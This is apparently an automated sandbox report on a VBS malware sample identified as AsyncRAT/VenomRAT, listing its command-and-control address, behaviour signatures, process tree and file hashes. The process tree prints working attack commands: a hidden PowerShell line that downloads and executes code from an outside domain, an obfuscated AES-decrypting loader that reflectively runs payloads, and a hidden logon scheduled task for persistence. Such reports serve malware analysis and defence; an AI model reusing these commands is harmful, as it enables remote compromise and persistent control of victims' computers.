Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-12-2024 02:38
Static task
static1
Behavioral task
behavioral1
Sample
6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663.vbs
Resource
win7-20240903-en
General
-
Target
6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663.vbs
-
Size
78KB
-
MD5
f5bfac09b17af66506e500ce22c71f92
-
SHA1
bf949f2cb7457bcc173e0b98f656be133a088225
-
SHA256
6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663
-
SHA512
5cab281eae07d317c02f031986b472967b4ffdca1dc3343d4e697f1ae1d8503ba237e5e1c7b60b55154f29421f7d3c79e1f125b56f96b98bcd58fa1677756d26
-
SSDEEP
1536:9dKIP+7Eys+3Xe05WVD8/PSfxDrtlsMKePYPm9nPJ6oMM:9dKIP8EyF3rqD8/2xvtBP0InR6NM
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
45.149.241.239:1978
ewdlylafhlapsawrztd
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
resource yara_rule behavioral2/memory/368-64-0x000001DCBCB90000-0x000001DCBCBA8000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/368-64-0x000001DCBCB90000-0x000001DCBCBA8000-memory.dmp family_asyncrat -
Blocklisted process makes network request 5 IoCs
flow pid Process 34 368 powershell.exe 38 368 powershell.exe 45 368 powershell.exe 46 368 powershell.exe 50 368 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 2012 powershell.exe 368 powershell.exe 1960 powershell.exe 2388 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 1960 powershell.exe 1960 powershell.exe 2388 powershell.exe 2388 powershell.exe 2012 powershell.exe 2012 powershell.exe 368 powershell.exe 368 powershell.exe 368 powershell.exe 368 powershell.exe 368 powershell.exe 368 powershell.exe 368 powershell.exe 368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1960 powershell.exe Token: SeDebugPrivilege 2388 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeIncreaseQuotaPrivilege 2012 powershell.exe Token: SeSecurityPrivilege 2012 powershell.exe Token: SeTakeOwnershipPrivilege 2012 powershell.exe Token: SeLoadDriverPrivilege 2012 powershell.exe Token: SeSystemProfilePrivilege 2012 powershell.exe Token: SeSystemtimePrivilege 2012 powershell.exe Token: SeProfSingleProcessPrivilege 2012 powershell.exe Token: SeIncBasePriorityPrivilege 2012 powershell.exe Token: SeCreatePagefilePrivilege 2012 powershell.exe Token: SeBackupPrivilege 2012 powershell.exe Token: SeRestorePrivilege 2012 powershell.exe Token: SeShutdownPrivilege 2012 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeSystemEnvironmentPrivilege 2012 powershell.exe Token: SeRemoteShutdownPrivilege 2012 powershell.exe Token: SeUndockPrivilege 2012 powershell.exe Token: SeManageVolumePrivilege 2012 powershell.exe Token: 33 2012 powershell.exe Token: 34 2012 powershell.exe Token: 35 2012 powershell.exe Token: 36 2012 powershell.exe Token: SeIncreaseQuotaPrivilege 2012 powershell.exe Token: SeSecurityPrivilege 2012 powershell.exe Token: SeTakeOwnershipPrivilege 2012 powershell.exe Token: SeLoadDriverPrivilege 2012 powershell.exe Token: SeSystemProfilePrivilege 2012 powershell.exe Token: SeSystemtimePrivilege 2012 powershell.exe Token: SeProfSingleProcessPrivilege 2012 powershell.exe Token: SeIncBasePriorityPrivilege 2012 powershell.exe Token: SeCreatePagefilePrivilege 2012 powershell.exe Token: SeBackupPrivilege 2012 powershell.exe Token: SeRestorePrivilege 2012 powershell.exe Token: SeShutdownPrivilege 2012 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeSystemEnvironmentPrivilege 2012 powershell.exe Token: SeRemoteShutdownPrivilege 2012 powershell.exe Token: SeUndockPrivilege 2012 powershell.exe Token: SeManageVolumePrivilege 2012 powershell.exe Token: 33 2012 powershell.exe Token: 34 2012 powershell.exe Token: 35 2012 powershell.exe Token: 36 2012 powershell.exe Token: SeIncreaseQuotaPrivilege 2012 powershell.exe Token: SeSecurityPrivilege 2012 powershell.exe Token: SeTakeOwnershipPrivilege 2012 powershell.exe Token: SeLoadDriverPrivilege 2012 powershell.exe Token: SeSystemProfilePrivilege 2012 powershell.exe Token: SeSystemtimePrivilege 2012 powershell.exe Token: SeProfSingleProcessPrivilege 2012 powershell.exe Token: SeIncBasePriorityPrivilege 2012 powershell.exe Token: SeCreatePagefilePrivilege 2012 powershell.exe Token: SeBackupPrivilege 2012 powershell.exe Token: SeRestorePrivilege 2012 powershell.exe Token: SeShutdownPrivilege 2012 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeSystemEnvironmentPrivilege 2012 powershell.exe Token: SeRemoteShutdownPrivilege 2012 powershell.exe Token: SeUndockPrivilege 2012 powershell.exe Token: SeManageVolumePrivilege 2012 powershell.exe Token: 33 2012 powershell.exe Token: 34 2012 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 368 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2988 wrote to memory of 1960 2988 WScript.exe 83 PID 2988 wrote to memory of 1960 2988 WScript.exe 83 PID 2988 wrote to memory of 1972 2988 WScript.exe 102 PID 2988 wrote to memory of 1972 2988 WScript.exe 102 PID 1972 wrote to memory of 2616 1972 cmd.exe 104 PID 1972 wrote to memory of 2616 1972 cmd.exe 104 PID 1972 wrote to memory of 2388 1972 cmd.exe 105 PID 1972 wrote to memory of 2388 1972 cmd.exe 105 PID 2388 wrote to memory of 2012 2388 powershell.exe 106 PID 2388 wrote to memory of 2012 2388 powershell.exe 106 PID 2388 wrote to memory of 1872 2388 powershell.exe 109 PID 2388 wrote to memory of 1872 2388 powershell.exe 109 PID 1872 wrote to memory of 3648 1872 WScript.exe 110 PID 1872 wrote to memory of 3648 1872 WScript.exe 110 PID 3648 wrote to memory of 3944 3648 cmd.exe 112 PID 3648 wrote to memory of 3944 3648 cmd.exe 112 PID 3648 wrote to memory of 368 3648 cmd.exe 113 PID 3648 wrote to memory of 368 3648 cmd.exe 113
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mvtIQEpeE2igYXIdDEEHrUp8bEsGaEVGh0sp8SAhblA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vT8eb5DW9nWYQVd4hxOXDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GQouJ=New-Object System.IO.MemoryStream(,$param_var); $OJwfz=New-Object System.IO.MemoryStream; $jgIod=New-Object System.IO.Compression.GZipStream($GQouJ, [IO.Compression.CompressionMode]::Decompress); $jgIod.CopyTo($OJwfz); $jgIod.Dispose(); $GQouJ.Dispose(); $OJwfz.Dispose(); $OJwfz.ToArray();}function execute_function($param_var,$param2_var){ $zmCZQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $brFtT=$zmCZQ.EntryPoint; $brFtT.Invoke($null, $param2_var);}$tofzw = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $tofzw;$UpwQA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tofzw).Split([Environment]::NewLine);foreach ($ZFAFd in $UpwQA) { if ($ZFAFd.StartsWith('hSymiLYPJtzQULYISQvX')) { $aTuto=$ZFAFd.Substring(20); break; }}$payloads_var=[string[]]$aTuto.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_263_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_263.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_263.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_263.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mvtIQEpeE2igYXIdDEEHrUp8bEsGaEVGh0sp8SAhblA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vT8eb5DW9nWYQVd4hxOXDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GQouJ=New-Object System.IO.MemoryStream(,$param_var); $OJwfz=New-Object System.IO.MemoryStream; $jgIod=New-Object System.IO.Compression.GZipStream($GQouJ, [IO.Compression.CompressionMode]::Decompress); $jgIod.CopyTo($OJwfz); $jgIod.Dispose(); $GQouJ.Dispose(); $OJwfz.Dispose(); $OJwfz.ToArray();}function execute_function($param_var,$param2_var){ $zmCZQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $brFtT=$zmCZQ.EntryPoint; $brFtT.Invoke($null, $param2_var);}$tofzw = 'C:\Users\Admin\AppData\Roaming\Windows_Log_263.bat';$host.UI.RawUI.WindowTitle = $tofzw;$UpwQA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tofzw).Split([Environment]::NewLine);foreach ($ZFAFd in $UpwQA) { if ($ZFAFd.StartsWith('hSymiLYPJtzQULYISQvX')) { $aTuto=$ZFAFd.Substring(20); break; }}$payloads_var=[string[]]$aTuto.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:3944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:368
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
Filesize
1KB
MD5aa8efa56e1e40374bbd21e0e469dceb7
SHA133a592799d4898c6efdd29e132f2f76ec51dbc08
SHA25625eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf
SHA512ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
69KB
MD5cc49ce3b6a2c61afa08d46410a78514a
SHA12a0f7a3890ee4844194715d83aa6bf771250e9d6
SHA25626f4a4fe560cd59fdcaf064f059865da9b9723b7f8c8480e3e6bd8ccd6b3faf7
SHA512f785cb451bb0ecfd554e65152652222860803e560ebe06a526c7f17b3bdeda9033a29a0250f97450b37bdf9d34599ccb9e5cb57fd97e46b83140076557b19d0b
-
Filesize
115B
MD57b1775d1a6183d21dcb417373b2a7251
SHA11232cda110e1744d55266b431bca13ef83d88da5
SHA256eb8df6a3df19e4bc8f2bdf6d7e9098f27b7838cbd16c2025d3f371ee727ffcfe
SHA5123e3ff95d9324d3fee11da26b34e532723933eec2d4c28525990f3a0f1e8319f4f7d86c162e843d2be10b6d6a56b59816945cad66a2c13bd418fd0df49ceb94b5